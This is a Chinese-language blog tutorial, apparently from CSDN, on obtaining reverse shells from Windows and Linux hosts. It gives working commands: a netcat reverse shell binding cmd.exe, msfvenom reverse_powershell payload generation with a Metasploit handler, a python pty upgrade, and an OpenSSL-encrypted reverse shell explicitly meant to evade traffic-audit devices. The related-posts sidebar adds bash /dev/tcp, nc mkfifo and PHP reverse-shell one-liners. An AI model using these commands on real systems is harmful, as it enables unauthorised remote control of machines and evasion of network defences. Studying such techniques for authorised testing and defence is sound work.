Windows下反弹shell的方式

最新推荐文章于 2024-05-09 14:38:44 发布
最新推荐文章于 2024-05-09 14:38:44 发布
阅读量5.7k 收藏 11
点赞数 7
分类专栏: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ws1813004226/article/details/117248359
版权

一、Windows下反弹shell

1.nc反弹
(1)我们先在被控制主机下载netcat。netcat下载

(2)cmd下打开下载目录,输入:

nc 192.168.59.131 9999 -e C:\Users\21124\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\cmd.exe(本机cmd文件路径)

(3)可以看到shell是反弹回来的,但是可能由于防火墙的原因,控制极其不稳定。
在这里插入图片描述
在这里插入图片描述
2.msf反弹
(1)使用 msfvenom -l 结合关键字过滤(如cmd/windows/reverse),找出我们可能需要的payload。
(2)使用msfvenom生成一个powershell类型的木马。
(3)开启监听端口。
(4)目标机在cmd下执行生成的powershell脚本,powershell下执行好像反弹不了。可以看到,这里是反弹成功的。

msfvenom -l payloads | grep 'cmd/windows/reverse'
msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.40.146 LPORT=4444
use exploit/multi/handler
show options
set LHOST your-ip
show options(查看是否配置齐全)
run

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
3.利用CS主机上线。

二、交互式shell与非交互式shell

交互式模式就是在终端上执行,shell等待你的输入,并且立即执行你提交的命令。这种模式被称作交互式是因为shell与用户进行交互。这种模式也是大多数用户非常熟悉的:登录、执行一些命令、退出。当你退出后,shell也终止了。
shell也可以运行在另外一种模式:非交互式模式,以shell script(非交互)方式执行。在这种模式 下,shell不与你进行交互,而是读取存放在文件中的命令,并且执行它们。当它读到文件的结尾EOF,shell也就终止了。
通过上述命令反弹shell得到的shell并不能称为完全交互的shell,通常称之为“哑”shell。
通常存在以下缺点
1.ctrl-c会中断会话;
2.无法正常使用vim等文本编辑器;
3.没有向上箭头使用历史;
4.无法执行交互式命令;
5.无法查看错误输出;
6.无法使用 tab 命令补全;
7.无法操控jobcontrol。
**因此有必要去获取一个完全交互的shell,**方法就是在shell 中执行python,使用pty模块,创建一个原生的终端。下面提供两条命令,主要是因为有的机器可能是python2,有的是3,我这里是python2。

python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
可以看到我们通过nc反弹得到的shell并不是一个完全交互的shell,输入的cat、ifconfig命令是无效的;在我们通过python得到的完全交互式shell可以实现对被控制主机的任意操作。

三、流量加密

部分防护设备会对内外网传输流量进行审查,反弹shell执行命令都是以明文进行传输的,很容易被查杀。因此需要将原始流量使用 openssl 加密,绕过流量审计设备。
1、首先kali上生成SSL证书的公钥/私钥对,信息懒得填,一直回车即可。

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes

2、kali使用 OpenSSL 监听一个端口。

openssl s_server -quiet -key key.pem -cert cert.pem -port 8888

3、目标主机执行反弹加密shell。

mkfifo /tmp/s; /bin/bash -i < /tmp/s 2>&1 | openssl s_client -quiet -connect ip:port > /tmp/s; rm /tmp/s

在这里插入图片描述
在这里插入图片描述

我们可以通过wireshark查看流量是否被加密,由于我不会使用wireshark,就先留着吧,以后来填坑。

原文链接:https://blog.csdn.net/weixin_44288604/article/details/111740527

树火
关注
  • 7
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Windows的几种常用反弹shell方法
hackzkaq的博客
02-21 1万+
零基础学黑客,搜索公众号:白帽子左一 简介:shell类似于DOS下的COMMAND.COM和后来的cmd.exe,它接收用户命令,然后调用相应的应用程序,也可以通俗的说是命令执行环境。分为交互式shell,与非交互式shell。 交互shell就是shell等待你的输入,并且立即执行你提交的命令,这种模式被称作交互式是因为shell与用户进行交互。 非交互shell不会与用户进行交互,而是用户读取存放在文件中的命令或者输入的命令,并且执行它们。当它读到文件的结尾,shell也就终止了。 1.nc反弹sh
【渗透笔记】windows反弹shell方法大全
白菜猪肉炖粉条
01-06 1855
正向shell: 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。 反向shell反弹shell): 被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口 被占用等问题导致被控端不能正常接收发送过来的数据包。 nc nc正向shell 被控端: nc -lvvp 6666 -e cmd.exe 开启监听 控制端: nc 192.168.1.62 6666 此原理就是,被控端将cmd.exe重定向到本地的6666端口,控制端主动连接被控端的6666端口,即可获得sh
cmd反弹shell提权
10-24
cmd反弹shell提权
网络安全-反弹shell详解(攻击,检测与防御)_反弹shell原理及防御方法
最新发布
2401_84264491的博客
05-09 538
如果我们需要到服务器上执行 Shell 命令,但是因为防火墙等原因,无法由客户端主动发起连接的情况,就可以使用反弹 Shell 来满足登陆和操作的需求。
内网渗透之Windows反弹shell(一)
不知名白帽的博客
07-08 2002
内网渗透之Windows反弹shell(一)(反向shell简介、Windows反弹shell
反弹shell方式
qq_44882633的博客
05-27 234
bash -c 'exec bash -i &>/dev/tcp/1.1.1.1/8899 <&1' rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1.1.1.1 8899 >/tmp/f php -r '$sock=fsockopen(getenv("1.1.1.1"),getenv("8899"));exec("/bin/sh -i <&3 >&3 2>&a
Windows 反弹shell方法
weixin_53747497的博客
07-12 2637
正向shell : 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell反弹shell):被控端主动发起连接请求去连接控制端,通常被控端 由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送 过来的数据包。
渗透测试-window反弹shell
lza20001103的博客
05-11 4245
window反弹shell
渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Windows篇(゚益゚メ) 渗透测试
寻觅的博客
04-07 3019
文章目录反弹shell介绍常用反弹方式NetCat(NC)反弹正向NC反向NCmshta.exe利用msf利用模块方法一(msfconsole)方法二(msfvenom)Cobaltstrike利用模块hta攻击源码rundll32.exe利用msf利用模块方法一(msfconsole)方法二(msfvenom)Rundll32加载htaRegsvr32.exe利用msiexec.exe利用powershell脚本绕过杀软混淆处理 反弹shell介绍 反弹shell主要就是让我们能远程连接到目标控制台并且下
反弹Shell方法论,Windows
大河之犬的博客
10-10 739
使用它你可以轻易的建立任何连接。要创建Powershell反向Shell,黑客需要在目标系统上运行一个恶意的Powershell脚本,该脚本将与攻击者的服务器建立连接。Powershell反向Shell是一种常用的攻击技术,用于在目标系统上建立与攻击者控制的远程服务器之间的连接。Perl反向Shell是一种利用Perl编写的恶意脚本,用于建立与目标系统的反向连接。在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。
Window下的反弹shell
qq_58000413的博客
05-05 1148
什么是正向shell?正向shell:控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell:被控制端主动发起连接去请求连接控制,通常被控端由于防火墙受限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。
Windows反弹shell的方法
热门推荐
2ed
07-16 1万+
1.powercat反弹shell powercat(https://github.com/besimorhino/powercat )为Powershell版的Netcat,实际上是一个powershell的函数,使用方法类似Netcat 首先攻击者开启监听 nc -lvp 6666 或者使用powercat监听 powercat -l -p 6666 接着在目标机上反弹cmd shell:...
python反向连接shell,可穿透防火墙
07-30
python reverse_shell.py 反弹目的ip 3322 反弹目的ip 执行nc -l 3322 即可连结 被控端
Golang反弹shell(使用邮件获取反弹地址)
09-29
使用邮件地址作为反弹shell的服务器地址,用于windows反弹shell,可在编译时选择隐藏弹出窗口 This golng reverse shell fetches the address from your latest email subject, and the subject should be like ...
反弹shell1
08-03
反弹Shell是一种黑客技术,常用于渗透测试和恶意攻击中,它允许攻击者远程控制目标系统。在这种场景下,攻击者通常在自己的机器上设置一个监听服务,然后在目标机器上执行特定的命令,使得目标机器的Shell(命令行...
go语言邮件反弹shellwindows+linux版,windows版用go1.7编译运行不报毒
11-03
go语言邮件反弹shellwindows+linux版,windows版用go1.7编译运行不报毒 此版本为后续改进debug版本,windows下可以编译去掉显示窗口 添加linux版本
53.Windows漏洞利用之Metasploit实现栈溢出攻击及反弹shell1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。前文学习:[网络
网络安全-木马入侵windows -msfvenom反弹shellCMD
weixin_48137911的博客
02-19 5759
需要做什么呢漏洞与木马的区别在于漏洞是某个系统某个框架,才能用特定的环境下才可以但是木马是全部机器都可以用因为木马相当于软件如果你电脑不能安装软件那你这个电脑也没啥用。
内网渗透---反弹shell详解(内有各种姿势的详细过程)
weixin_45588247的博客
04-08 3176
声明:文章技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可用于 违法犯罪,一经发现直接上报国家安全机关处理. 反弹shell 反弹shell: 在攻击者机器获得受害者机器的命令行。 文章目录反弹shell背景:正向反弹shell:目的:前提:实验环境:网络拓扑:实验步骤:反向反弹shell:目的:前提:实验环境:网络拓扑:实验步骤:其他方式反弹shell:msf反弹:实验环境:实验步骤:bash反弹:实验环境:实验步骤:python反弹:实验环境:实验步骤:php反弹:实验环境:实验步骤:p.
windows 反弹shell
07-29
Windows系统中,反弹shell是一种常见的攻击技术,用于获取对目标机器的远程访问权限。有几种常见的方法可以实现Windows反弹shell。 一种方法是使用Metasploit框架。首先,使用msfvenom生成一个powershell类型的木马,然后开启监听端口。目标机在命令提示符下执行生成的powershell脚本,即可实现反弹shell。需要注意的是,有时由于防火墙的原因,控制可能会不稳定。\[1\] 另一种方法是使用nc(netcat)工具进行反弹。通过nc反弹得到的shell可能不是一个完全交互的shell,某些命令可能无效。相比之下,通过Python脚本得到的shell可以实现对被控制主机的任意操作。\[2\] 此外,还有一些基于PowerShell的攻击框架,如Nishang,它集合了一些PowerShell攻击脚本和有效载荷,可用于反弹TCP/UDP/HTTP/HTTPS/ICMP等类型的shell。\[3\] 总结起来,Windows反弹shell的方法包括使用Metasploit框架、nc工具以及基于PowerShell的攻击框架。具体选择哪种方法取决于实际需求和环境。 #### 引用[.reference_title] - *1* *2* [Windows反弹shell方式](https://blog.csdn.net/ws1813004226/article/details/117248359)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [Windows反弹shell的方法](https://blog.csdn.net/qq_39101049/article/details/96191861)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值